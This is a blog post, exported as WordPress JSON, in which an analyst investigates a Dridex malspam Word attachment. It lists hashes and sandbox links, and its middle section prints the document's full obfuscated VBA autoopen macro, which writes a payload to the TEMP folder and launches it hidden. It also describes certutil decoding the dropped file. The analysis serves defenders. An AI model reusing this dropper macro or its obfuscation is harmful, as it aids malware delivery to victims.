{"id":514,"date":"2016-05-22T22:01:49","date_gmt":"2016-05-22T21:01:49","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=514"},"modified":"2016-05-22T22:36:50","modified_gmt":"2016-05-22T21:36:50","slug":"2016-05-22-malicious-dridex-email","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=514","title":{"rendered":"2016-05-22 Malicious Dridex email"},"content":{"rendered":"<p>The other day while working we started to get a wave of malspam hitting the company. Looking into this malicious Word document revealed something was a little different than what I was used to seeing from Dridex Word malspam. The thing that really made me scratch my head was the fact that I was not seeing any traffic that looked malicious, and one of the files that was dropped had the same hash as the Windows &#8220;calc.exe.&#8221; The next day while waiting for the family to get ready to go out, I started Googling around for some of the things that I saw from this infection and low-and-behold I came across this <a href=\"http:\/\/www.malwaretech.com\/2016\/05\/dridex-updates-payload-distribution.html\" target=\"_blank\">great post<\/a> from <a href=\"http:\/\/twitter.com\/MalwareTechBlog\" target=\"_blank\">@MalwareTechBlog<\/a> about this &#8220;new&#8221; technique for Dridex. I also did a simple search for &#8220;dridex calc.exe&#8221; and stumbled upon this <a href=\"http:\/\/twitter.com\/benkow_\/status\/659637462747193344\" target=\"_blank\">Twitter post<\/a> from <a href=\"http:\/\/twitter.com\/@benkow_\" target=\"_blank\">@benkow_<\/a>. I can&#8217;t say for sure, but from what I am seeing in this investigation it looks like the malware dropped &#8220;calc.exe&#8221; on the system. For the artifacts from this post please see the <a href=\"http:\/\/github.com\/bloomer1016\/Malicious-Dridex-Email-2016-05-20\" target=\"_blank\">Github repo here.<\/a><\/p>\n<p>IOCs:<br \/>\n======<br \/>\nNA<\/p>\n<p>The user received an email containing the attached malicious Word document as seen below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG1-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-515\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG1-2.png\" alt=\"\" width=\"952\" height=\"293\" \/><\/a><\/p>\n<p>Below is the information about the zip file and the Word doc:<\/p>\n<p>File name: Invoice 1999-551715.zip<br \/>\nFile size: 509KB<br \/>\nMD5 hash: c42ab74fc4b431b6d5a44ed4d34ce145<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/216077017d707bc6cd0badd0491a40dc19a1a395e72988b1fedb12e664abade9\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/216077017d707bc6cd0badd0491a40dc19a1a395e72988b1fedb12e664abade9\/analysis\/<\/a><br \/>\nDetection rate: 12 \/ 56<br \/>\nFirst seen: 2016-05-14 23:13:01 UTC<\/p>\n<p>File name: invoice19464.doc<br \/>\nFile size: 1.22MB<br \/>\nMD5 hash: 596b3b9e68851ee8260ef0e8483a1057<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/fd0d4e84a6b7daa707cd32e9e4d23d3103f7a2d175017308e593647ac498a0dd\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/fd0d4e84a6b7daa707cd32e9e4d23d3103f7a2d175017308e593647ac498a0dd\/analysis\/<\/a><br \/>\nDetection rate: 12 \/ 57<br \/>\nFirst seen: 2016-05-20 10:45:51 UTC<br \/>\nMalwr link: <a href=\"http:\/\/malwr.com\/analysis\/ZjY5MjY3NGRhZWUyNGI0NDlmNzZjZTJjMDA5MDg2OTQ\/\" target=\"_blank\">http:\/\/malwr.com\/analysis\/ZjY5MjY3NGRhZWUyNGI0NDlmNzZjZTJjMDA5MDg2OTQ\/<\/a><\/p>\n<p>I also managed to stumble upon this analysis from Hybrid-Analysis for a Word document that dropped files named &#8220;panda.exe&#8221; and &#8220;panda.pfx.&#8221; It should be noted that the hashes for the files do not match at all.<\/p>\n<p>At this point I won&#8217;t bore you with the details as this is pretty much the same attack vector used by malspam for a while now. Let&#8217;s skip to the good stuff. Opening up the archive via 7zip and looking around I first spotted the fact that this was not the usual looking macro-laden Word document that I have become accustomed to seeing. The layout and the folders looked different as you can see below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG2-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-516\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG2-2.png\" alt=\"\" width=\"718\" height=\"229\" \/><\/a><\/p>\n<p>I ran the Word document through OfficeMalScanner and it ended up crashing it, but not before giving me something to work with as you can see here:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG3-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-517\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG3-2.png\" alt=\"\" width=\"667\" height=\"533\" \/><\/a><\/p>\n<p>OfficeMalScanner dropped two files for me: one called &#8220;nOOigygasHs,&#8221; and another one called &#8220;ThisDocument.&#8221; The file &#8220;nOOigygasHs&#8221; has the following in it:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nAttribute VB_Name = &quot;nOOigygasHs&quot;\r\nAttribute VB_Base = &quot;0{494FCA16-FB87-472C-B7F5-3F4A8A83DA8F}{159F8322-6A94-433E-A146-6FAE3305269B}&quot;\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = False\r\nAttribute VB_TemplateDerived = False\r\nAttribute VB_Customizable = False<\/pre>\n<p>while &#8220;ThisDocument&#8221; has the following:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nAttribute VB_Name = &quot;ThisDocument&quot;\r\nAttribute VB_Base = &quot;1Normal.ThisDocument&quot;\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nSub autoopen()\r\n\r\nDim hgJBsdasdDD, TDYFUGasdDc\r\nDim PZOTcVvh, IddlwNtF, MlBwVFiB As String\r\nDim PWkSOXRl, TXZVrazm, ACSpvtbw As String\r\nPWkSOXRl = &quot; VSQVOK &quot;\r\nTXZVrazm = LTrim(PWkSOXRl)\r\nACSpvtbw = RTrim(TXZVrazm)\r\n\r\nPZOTcVvh = &quot; HBYBNA &quot;\r\nDim iRrAyvqN, NWWdCTnE, TJZUpakw As String\r\niRrAyvqN = &quot; KYKFBV &quot;\r\nNWWdCTnE = LTrim(iRrAyvqN)\r\nTJZUpakw = RTrim(NWWdCTnE)\r\n\r\nIddlwNtF = LTrim(PZOTcVvh)\r\nDim vNRhWiWu, aqKpRTRA, haVDPjHp As String\r\nvNRhWiWu = &quot; OLLRCU &quot;\r\naqKpRTRA = LTrim(vNRhWiWu)\r\nhaVDPjHp = RTrim(aqKpRTRA)\r\n\r\nMlBwVFiB = RTrim(IddlwNtF)\r\n\r\nDim gAzpgkkf, nUFdJywv, SDnhlLvO As String\r\ngAzpgkkf = &quot; TBGFWQ &quot;\r\nnUFdJywv = LTrim(gAzpgkkf)\r\nSDnhlLvO = RTrim(nUFdJywv)\r\n\r\nJJnasfHJs = nOOigygasHs.hgKjhasdjDDD1 + nOOigygasHs.hgKjhasdjDDD2 + nOOigygasHs.hgKjhasdjDDD3 + nOOigygasHs.hgKjhasdjDDD4 + nOOigygasHs.hgKjhasdjDDD5 + nOOigygasHs.hgKjhasdjDDD6 + nOOigygasHs.hgKjhasdjDDD7 + nOOigygasHs.hgKjhasdjDDD8 + nOOigygasHs.hgKjhasdjDDD9 + nOOigygasHs.hgKjhasdjDDD10\r\nDim lWwvOhlk, gWTPrlHl, pXGXvvfm As String\r\nDim zlChhEUG, CmiAPUtH, LwkDtSZK As String\r\nzlChhEUG = &quot; UVADNI &quot;\r\nCmiAPUtH = LTrim(zlChhEUG)\r\nLwkDtSZK = RTrim(CmiAPUtH)\r\n\r\nlWwvOhlk = &quot; HQDJOA &quot;\r\nDim AFeYjrxM, uOQaEvgQ, SRlwHLyE As String\r\nAFeYjrxM = &quot; ZQKHRD &quot;\r\nuOQaEvgQ = LTrim(AFeYjrxM)\r\nSRlwHLyE = RTrim(uOQaEvgQ)\r\n\r\ngWTPrlHl = LTrim(lWwvOhlk)\r\nDim BbYiBYtl, dhQSrkjz, GnNYDGNw As String\r\nBbYiBYtl = &quot; GWHKPN &quot;\r\ndhQSrkjz = LTrim(BbYiBYtl)\r\nGnNYDGNw = RTrim(dhQSrkjz)\r\n\r\npXGXvvfm = RTrim(gWTPrlHl)\r\n\r\nDim LAgscEzT, tUagBktH, jDDkntia As String\r\nLAgscEzT = &quot; APNCFP &quot;\r\ntUagBktH = LTrim(LAgscEzT)\r\njDDkntia = RTrim(tUagBktH)\r\n\r\nyufGHJ = &quot;iptin&quot;\r\nDim TGIqKzki, qQhTtcpN, HYVakKaJ As String\r\nDim ItEKzSbR, RtDrxJCY, byChJWmU As String\r\nItEKzSbR = &quot; VHJALD &quot;\r\nRtDrxJCY = LTrim(ItEKzSbR)\r\nbyChJWmU = RTrim(RtDrxJCY)\r\n\r\nTGIqKzki = &quot; CAEVZM &quot;\r\nDim gGSXWydz, LPlkoAtM, vTaSwXXQ As String\r\ngGSXWydz = &quot; GATHRX &quot;\r\nLPlkoAtM = LTrim(gGSXWydz)\r\nvTaSwXXQ = RTrim(LPlkoAtM)\r\n\r\nqQhTtcpN = LTrim(TGIqKzki)\r\nDim FqUBuYrB, eaDEdkhU, TszcXGBa As String\r\nFqUBuYrB = &quot; PFJDFN &quot;\r\neaDEdkhU = LTrim(FqUBuYrB)\r\nTszcXGBa = RTrim(eaDEdkhU)\r\n\r\nHYVakKaJ = RTrim(qQhTtcpN)\r\n\r\nDim ZVetOHBt, nOYKUKTE, SGlWoYIF As String\r\nZVetOHBt = &quot; SPGSTC &quot;\r\nnOYKUKTE = LTrim(ZVetOHBt)\r\nSGlWoYIF = RTrim(nOYKUKTE)\r\n\r\ngUYbjk = &quot;stemOb&quot;\r\nDim SwOXlWmc, asFbvYYy, Ecelirhn As String\r\nDim YHeMMLST, ZJdyfCpY, cJxkIzUI As String\r\nYHeMMLST = &quot; COEZGH &quot;\r\nZJdyfCpY = LTrim(YHeMMLST)\r\ncJxkIzUI = RTrim(ZJdyfCpY)\r\n\r\nSwOXlWmc = &quot; OMJSLI &quot;\r\nDim twyxzlNO, CSXiLngd, ZIRZyXut As String\r\ntwyxzlNO = &quot; JZLQCW &quot;\r\nCSXiLngd = LTrim(twyxzlNO)\r\nZIRZyXut = RTrim(CSXiLngd)\r\n\r\nasFbvYYy = LTrim(SwOXlWmc)\r\nDim YZmNKJBt, oDOMAgIv, cEGcYNMu As String\r\nYZmNKJBt = &quot; DUGXWB &quot;\r\noDOMAgIv = LTrim(YZmNKJBt)\r\ncEGcYNMu = RTrim(oDOMAgIv)\r\n\r\nEcelirhn = RTrim(asFbvYYy)\r\n\r\nDim QmlCnQnl, OyXOvDuL, WsISanpe As String\r\nQmlCnQnl = &quot; JXCIAM &quot;\r\nOyXOvDuL = LTrim(QmlCnQnl)\r\nWsISanpe = RTrim(OyXOvDuL)\r\n\r\nSet hgJBsdasdDD = CreateObject(&quot;Scr&quot; + yufGHJ + &quot;g.FileSy&quot; + gUYbjk + &quot;ject&quot;)\r\nDim EDNjGrlc, ZcErDyNX, FEhugLeu As String\r\nDim UoqfFTUX, EpmboPtV, vpRQEFZB As String\r\nUoqfFTUX = &quot; CKUSSP &quot;\r\nEpmboPtV = LTrim(UoqfFTUX)\r\nvpRQEFZB = RTrim(EpmboPtV)\r\n\r\nEDNjGrlc = &quot; DTFKOR &quot;\r\nDim xMGYtHAp, aGczkqlz, YPtxRYpL As String\r\nxMGYtHAp = &quot; NFQJVU &quot;\r\naGczkqlz = LTrim(xMGYtHAp)\r\nYPtxRYpL = RTrim(aGczkqlz)\r\n\r\nZcErDyNX = LTrim(EDNjGrlc)\r\nDim gtUazCyF, EWSTuIkx, yuabHyaH As String\r\ngtUazCyF = &quot; CQHFQO &quot;\r\nEWSTuIkx = LTrim(gtUazCyF)\r\nyuabHyaH = RTrim(EWSTuIkx)\r\n\r\nFEhugLeu = RTrim(ZcErDyNX)\r\n\r\nDim peUDviJz, wolHNXMd, lLCZVVnS As String\r\npeUDviJz = &quot; EDTENY &quot;\r\nwolHNXMd = LTrim(peUDviJz)\r\nlLCZVVnS = RTrim(wolHNXMd)\r\n\r\nasjhdbkx = &quot;da.pf&quot;\r\nDim lwGCMgsK, fxBpflOL, pcowIcuW As String\r\nDim AlRDCDJX, clFBjKgC, llVqQXSV As String\r\nAlRDCDJX = &quot; MCJVHD &quot;\r\nclFBjKgC = LTrim(AlRDCDJX)\r\nllVqQXSV = RTrim(clFBjKgC)\r\n\r\nlwGCMgsK = &quot; HBCRGA &quot;\r\nDim TlLlYZLy, pgnDLCPV, GpoiykZG As String\r\nTlLlYZLy = &quot; CHIZCY &quot;\r\npgnDLCPV = LTrim(TlLlYZLy)\r\nGpoiykZG = RTrim(pgnDLCPV)\r\n\r\nfxBpflOL = LTrim(lwGCMgsK)\r\nDim hnRqKHVj, KQLtAfUQ, uABOUBLl As String\r\nhnRqKHVj = &quot; TYMAWV &quot;\r\nKQLtAfUQ = LTrim(hnRqKHVj)\r\nuABOUBLl = RTrim(KQLtAfUQ)\r\n\r\npcowIcuW = RTrim(fxBpflOL)\r\n\r\nDim HFuDZdro, eMLHrail, gNTLTGqE As String\r\nHFuDZdro = &quot; LYKEZI &quot;\r\neMLHrail = LTrim(HFuDZdro)\r\ngNTLTGqE = RTrim(eMLHrail)\r\n\r\nSet TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ(&quot;TEMP&quot;) &amp;amp; &quot;\\pan&quot; + asjhdbkx + &quot;x&quot;, True)\r\nDim IawqTVly, nksXxyIO, ydMjOnnA As String\r\nDim pVYReBWK, tBHHxrlL, aBNeJoHM As String\r\npVYReBWK = &quot; QDKMLL &quot;\r\ntBHHxrlL = LTrim(pVYReBWK)\r\naBNeJoHM = RTrim(tBHHxrlL)\r\n\r\nIawqTVly = &quot; YJAYQQ &quot;\r\nDim GIGOXlOg, mExroFnu, fMfGNWGP As String\r\nGIGOXlOg = &quot; OIQKLW &quot;\r\nmExroFnu = LTrim(GIGOXlOg)\r\nfMfGNWGP = RTrim(mExroFnu)\r\n\r\nnksXxyIO = LTrim(IawqTVly)\r\nDim thsOLeKw, lykdBFrr, WjTuIsDc As String\r\nthsOLeKw = &quot; KJYTUS &quot;\r\nlykdBFrr = LTrim(thsOLeKw)\r\nWjTuIsDc = RTrim(lykdBFrr)\r\n\r\nydMjOnnA = RTrim(nksXxyIO)\r\n\r\nDim MLvcCrto, yNqnvJil, kyCENTsR As String\r\nMLvcCrto = &quot; WINWSR &quot;\r\nyNqnvJil = LTrim(MLvcCrto)\r\nkyCENTsR = RTrim(yNqnvJil)\r\n\r\nTDYFUGasdDc.Write (nOOigygasHs.hgKjhasdjDDD11)\r\nDim tDVDfnzT, lZrjldff, XFkqePCU As String\r\nDim tBJDSVcb, DRKIEhcG, IRzMCmWH As String\r\ntBJDSVcb = &quot; ZELHXB &quot;\r\nDRKIEhcG = LTrim(tBJDSVcb)\r\nIRzMCmWH = RTrim(DRKIEhcG)\r\n\r\ntDVDfnzT = &quot; KZBUJV &quot;\r\nDim tmsXeXYa, OjLjhkcK, gsAQZShP As String\r\ntmsXeXYa = &quot; JAXVCP &quot;\r\nOjLjhkcK = LTrim(tmsXeXYa)\r\ngsAQZShP = RTrim(OjLjhkcK)\r\n\r\nlZrjldff = LTrim(tDVDfnzT)\r\nDim ojLyNKnL, QZuNOhpd, NldEGawW As String\r\nojLyNKnL = &quot; MJXJPY &quot;\r\nQZuNOhpd = LTrim(ojLyNKnL)\r\nNldEGawW = RTrim(QZuNOhpd)\r\n\r\nXFkqePCU = RTrim(lZrjldff)\r\n\r\nDim TzbgrpYc, JiskTVOU, rfVmiQDK As String\r\nTzbgrpYc = &quot; WCTBTN &quot;\r\nJiskTVOU = LTrim(TzbgrpYc)\r\nrfVmiQDK = RTrim(JiskTVOU)\r\n\r\nTDYFUGasdDc.Close\r\nDim emlXEZBV, atXIARTx, dsIQrlIU As String\r\nDim TweGLhOb, Axfaflun, xccdIvRA As String\r\nTweGLhOb = &quot; XBRBFA &quot;\r\nAxfaflun = LTrim(TweGLhOb)\r\nxccdIvRA = RTrim(Axfaflun)\r\n\r\nemlXEZBV = &quot; BXCUEH &quot;\r\nDim WCNGkVvp, nLIpRlhz, yFhRJDiM As String\r\nWCNGkVvp = &quot; TTSDGJ &quot;\r\nnLIpRlhz = LTrim(WCNGkVvp)\r\nyFhRJDiM = RTrim(nLIpRlhz)\r\n\r\natXIARTx = LTrim(emlXEZBV)\r\nDim uaAwOZIe, OsHhlNkx, VzWLcSEt As String\r\nuaAwOZIe = &quot; NMKUJK &quot;\r\nOsHhlNkx = LTrim(uaAwOZIe)\r\nVzWLcSEt = RTrim(OsHhlNkx)\r\n\r\ndsIQrlIU = RTrim(atXIARTx)\r\n\r\nDim TTQxGzTx, EjfpDrqW, GxNdgKgy As String\r\nTTQxGzTx = &quot; FAYWIE &quot;\r\nEjfpDrqW = LTrim(TTQxGzTx)\r\nGxNdgKgy = RTrim(EjfpDrqW)\r\n\r\nShell JJnasfHJs, 0\r\n\r\nEnd Sub<\/pre>\n<p>The interesting thing here that I am not seeing, like I have seen in the past, is an open connection method to grab a file from a particular URL\/IP address. In the code above I see that there is a call to create a file, a call to write the file, and a call to close the newly written file. So looking at some of the other files that were extracted from the Word document to see if I could spot anything, I came across a file called &#8220;[3]VBFrame&#8221; with the following contents:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nVERSION 5.00\r\nBegin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} nOOigygasHs\r\nCaption = &quot;UserForm1&quot;\r\nClientHeight = 540\r\nClientLeft = 45\r\nClientTop = 375\r\nClientWidth = 6435\r\nStartUpPosition = 1 'CenterOwner\r\nTypeInfoVer = 23\r\nEnd<\/pre>\n<p>The long string (C62A69F0-16DC-11CE-9E98-00AA00574A4F) looks to be some sort of classid string (or at least I think it is &#8211; lol). Googling for this I stumbled across some links pointing to classes not being registered in VB applications (mostly for MS Dynamics). Interesting but not sure if it apples here. Unfortunately I was not able to find anything else in the other files.<\/p>\n<p>So with that being about all the reverse engineering skills that I currently have I decided to run this on my test VM to see what happens.<\/p>\n<p>Traffic Analysis<br \/>\n=================<\/p>\n<p>When the Word document is run, it looks as if it creates the PFX file (like MalwareTechBlog stated) from the macro in the Word document as evidenced from Process Monitor:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG4-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-518\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG4-2.png\" alt=\"\" width=\"676\" height=\"664\" \/><\/a><\/p>\n<p>and then writes it and then closes it. From here it looks like Word fires up a command prompt as seen below and uses the utility &#8220;certutil&#8221; to decode the base64 PFX file (panda.pfx) to then create and run the new binary (panda.exe) from the %TEMP% folder.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG5-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-519\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG5-2.png\" alt=\"\" width=\"1766\" height=\"837\" \/><\/a><\/p>\n<p>From here I did not see anything else call out. Even when I went back and looked at the YouTube clip of the malware being detonated I did not see it start up in Process Monitor. Even when re-running just the &#8220;panda.exe&#8221; binary on it&#8217;s own, I can see that the process start, it do a bunch of stuff, and then the thread stop in Process Monitor. The other thing is that I do not see anything in the PCAP either. There are no calls to anything from what I can see.<\/p>\n<p>Below is the information about the two panda files (panda.pfx and panda.exe):<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG6-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-520\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/05\/IMG6-1.png\" alt=\"\" width=\"1488\" height=\"1012\" \/><\/a><\/p>\n<p>File name: panda.exe<br \/>\nFile size: 897KB<br \/>\nMD5 hash: 10e4a1d2132ccb5c6759f038cdb6f3c9<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/c6a91cba00bf87cdb064c49adaac82255cbec6fdd48fd21f9b3b96abf019916b\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/c6a91cba00bf87cdb064c49adaac82255cbec6fdd48fd21f9b3b96abf019916b\/analysis\/<\/a><br \/>\nDetection rate: 0 \/ 57<br \/>\nFirst seen: 2009-09-04 00:23:55 UTC<br \/>\n***Note: Based on the MD5 here, this looks to be the Windows application calc.exe<\/p>\n<p>File name: panda.pfx<br \/>\nFile size: 1.16MB<br \/>\nMD5 hash: c42ab74fc4b431b6d5a44ed4d34ce145<br \/>\nVirustotal link: NA<\/p>\n<p>Here is the link for the video that I made while running the malware on my test VM: <iframe loading=\"lazy\" title=\"2016-05-20 Malicious Dridex email\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/HUlYZI-2IBc?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p>In conclusion, I do not see anything malicious being dropped on the system in this example and if anything, looks to be just dropping &#8220;calc.exe&#8221; onto the victim&#8217;s system. But at least it is an example of a changing tactic of Dridex.<\/p>\n<p>Thanks once again to <a href=\"http:\/\/twitter.com\/MalwareTechBlog\" target=\"_blank\">@MalwareTech<\/a> and <a href=\"http:\/\/twitter.com\/@benkow_\" target=\"_blank\">@benkow_<\/a> for the information and tips!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The other day while working we started to get a wave of malspam hitting the company. Looking into this malicious Word document revealed something was a little different than what I was used to seeing from Dridex Word malspam. The thing that really made me scratch my head was the fact that I was not seeing any traffic that looked malicious, and one of the files that was dropped had the same hash as the Windows &#8220;calc.exe.&#8221; The next day while waiting for the family to get ready to go out, I started Googling around for some of the things&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=514\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-514","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/514","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=514"}],"version-history":[{"count":7,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/514\/revisions"}],"predecessor-version":[{"id":527,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/514\/revisions\/527"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=514"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=514"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=514"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}